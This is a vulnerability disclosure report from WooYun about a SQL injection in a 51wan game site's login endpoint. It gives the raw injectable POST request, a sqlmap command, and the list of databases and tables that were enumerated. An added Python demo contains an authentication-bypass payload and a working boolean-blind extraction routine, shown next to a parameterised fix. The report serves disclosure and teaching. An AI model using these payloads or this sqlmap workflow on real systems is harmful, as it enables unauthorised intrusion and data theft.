
Vulnerability summary

Defect ID: wooyun-2015-0112770

Title: 51wan SQL injection #1

Vendor: 51wan.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-05-08 15:15

Fixed: 2015-06-22 15:54

Published: 2015-06-22 15:54

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help please contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-08: Details sent to the vendor, awaiting vendor action
2015-05-08: Vendor has confirmed; details visible to the vendor only
2015-05-18: Details opened to core white hats and domain experts
2015-05-28: Details opened to regular white hats
2015-06-07: Details opened to intern white hats
2015-06-22: Details opened to the public

Brief description:

Any gifts?

Detailed description:

POST /index.php?ajax=1 HTTP/1.1
Host: wkllcenter.51wan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://wkllcenter.51wan.com/
Content-Length: 78
Cookie: PHPSESSID=alnskkf7n1vt4tog5lp21i68t4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ctl=Role&act=login&login_state=0&login_name=admin&passwd=admin&time=1431019419


Save the request above as 2.txt and feed it to sqlmap.

[Screenshot: 1.png]


9 databases; I didn't count how many tables, I'll paste them below.

[Screenshot: 2.png]


Since the databases are already out, there's no point running any further; after all, I don't dump databases.
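The request above hits a login handler (ctl=Role&act=login) that drops login_name and passwd straight into SQL, and sqlmap enumerates the databases by turning that login's yes/no answer into an oracle. What follows is an added example, not code from 51wan or from the original post, that reproduces both halves in Python: the injectable login check next to its parameterised fix, and a hand-rolled boolean-blind extractor of the kind sqlmap automates. It uses an in-memory SQLite database as a stand-in for the real MySQL backend (the performance_schema and mysql databases in the dump identify it as MySQL), so the blind payload uses SQLite's unicode()/substr() where MySQL would use ASCII()/SUBSTRING(). The table name administrator comes from the dump; its columns and its one row are made up for the demo.

```python
# Added example for this report (not code from 51wan or from the original
# post). It reproduces the bug class behind the ctl=Role&act=login request:
# login_name / passwd concatenated into SQL. The table name `administrator`
# is taken from the dumped schema; its columns and row content are
# assumptions made up for the demo. SQLite stands in for the real MySQL
# backend, so the blind payload uses unicode()/substr() where MySQL would
# use ASCII()/SUBSTRING().
import sqlite3


def make_db():
    """Constructed in-memory stand-in for one of the admin_* databases."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE administrator (id INTEGER PRIMARY KEY, "
        "login_name TEXT, passwd TEXT)"
    )
    conn.execute(
        "INSERT INTO administrator (login_name, passwd) "
        "VALUES ('admin', 's3cret-not-admin')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, login_name, passwd):
    """Login check the way the injectable endpoint evidently does it:
    the POST fields are pasted straight into the WHERE clause."""
    sql = (
        "SELECT id FROM administrator "
        f"WHERE login_name = '{login_name}' AND passwd = '{passwd}'"
    )
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # A broken query just looks like a failed login to the caller,
        # which is all a boolean-blind attacker needs.
        return False


def login_fixed(conn, login_name, passwd):
    """Same check with a parameterised query: the values never become SQL."""
    sql = "SELECT id FROM administrator WHERE login_name = ? AND passwd = ?"
    return conn.execute(sql, (login_name, passwd)).fetchone() is not None


def blind_extract(oracle, expr, max_len=64):
    """Boolean-based blind extraction through a login form that only
    answers yes/no, i.e. the manual version of what sqlmap automates for
    this request. `oracle(login_name, passwd)` returns True on a successful
    login; `expr` is a SQL scalar expression evaluated inside the target
    database. Each character is found by asking "is character N of (expr)
    equal to c?" and watching whether the admin row still matches."""
    result = ""
    for pos in range(1, max_len + 1):
        for c in range(32, 127):  # printable ASCII
            payload = f"admin' AND unicode(substr(({expr}),{pos},1))={c}-- "
            if oracle(payload, "anything"):
                result += chr(c)
                break
        else:
            break  # no character matched: end of the string
    return result


def demo():
    """Run the bypass and the blind leak against both handlers."""
    conn = make_db()
    bypass = ("' OR '1'='1", "' OR '1'='1")  # classic auth bypass
    admin_pw = "SELECT passwd FROM administrator WHERE login_name='admin'"
    return {
        "bypass_vulnerable": login_vulnerable(conn, *bypass),
        "bypass_fixed": login_fixed(conn, *bypass),
        "leaked_passwd": blind_extract(
            lambda u, p: login_vulnerable(conn, u, p), admin_pw
        ),
        "leak_via_fixed": blind_extract(
            lambda u, p: login_fixed(conn, u, p), admin_pw
        ),
    }


if __name__ == "__main__":
    print(demo())
```

Run as a script it prints the result of demo(): the bypass succeeds and the admin password is recovered character by character through the vulnerable handler, while the parameterised handler yields neither. Against the real endpoint the equivalent work is what the screenshots show: save the request as 2.txt and run `sqlmap -r 2.txt --dbs`; sqlmap tests boolean-blind, error-based, union and time-based techniques and uses whichever the endpoint supports, so the loop above is only the slowest of the paths it would take.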

Proof of vulnerability:

Database: admin_sister
[5 tables]
+----------------------------------------------+
| activity_list |
| administrator |
| apply_daoju_log |
| game_server |
| log |
+----------------------------------------------+
Database: new_game
[60 tables]
+----------------------------------------------+
| user |
| activation_code |
| activity |
| arena |
| arena_score |
| backpack |
| baishen |
| banghui |
| banghui_member |
| banghui_shen |
| cross_server_auction |
| cross_server_fight |
| cross_server_wenDao |
| data1 |
| data10 |
| data11 |
| data12 |
| data13 |
| data14 |
| data15 |
| data16 |
| data17 |
| data18 |
| data19 |
| data2 |
| data20 |
| data3 |
| data4 |
| data5 |
| data6 |
| data7 |
| data8 |
| data9 |
| dataDaoju |
| dataFriend |
| dataMailSys |
| dataMission |
| dataPkLost |
| dataPkWin |
| dataSys |
| datagongde_shop |
| everyday |
| game_server |
| gamer |
| gamer_pay |
| ganqing_reward |
| gonggao |
| hufa_pk_stand |
| jingshi |
| mail |
| online |
| reg_limit |
| role_level |
| sale |
| talent |
| team |
| tmp_activity |
| unionFunc |
| unionRole |
| used_names |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: sheng_tu_admin_center
[5 tables]
+----------------------------------------------+
| activity_list |
| administrator |
| apply_daoju_log |
| game_server |
| log |
+----------------------------------------------+
Database: admin_goddess
[5 tables]
+----------------------------------------------+
| activity_list |
| administrator |
| apply_daoju_log |
| game_server |
| log |
+----------------------------------------------+
Database: new_game_cehua
[36 tables]
+----------------------------------------------+
| City |
| CityShop |
| City_bak |
| activity |
| attribute_correct |
| city_fuben |
| daoju |
| equipment |
| fight_jingyan |
| fuben |
| fuben_bak |
| fuben_rooms |
| fuben_rooms_bak |
| fuben_type |
| hornor |
| hornor_bak |
| hufa_moban |
| hufa_up_level_need_points |
| item_skill_set |
| mission |
| mission_bak |
| mission_conditions |
| mission_group |
| mission_group_bak |
| mission_op |
| mission_talk |
| quizStore |
| quizTopic |
| rules_hecheng |
| shop |
| skill |
| soul |
| sys |
| talent |
| test |
| weapon |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: new_game_admin
[6 tables]
+----------------------------------------------+
| admin_log |
| every_day_total |
| mission |
| online |
| role_level |
| save_lost |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+

Remediation:

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-05-08 15:52

Vendor reply:

Thanks for testing

Latest status:

None yet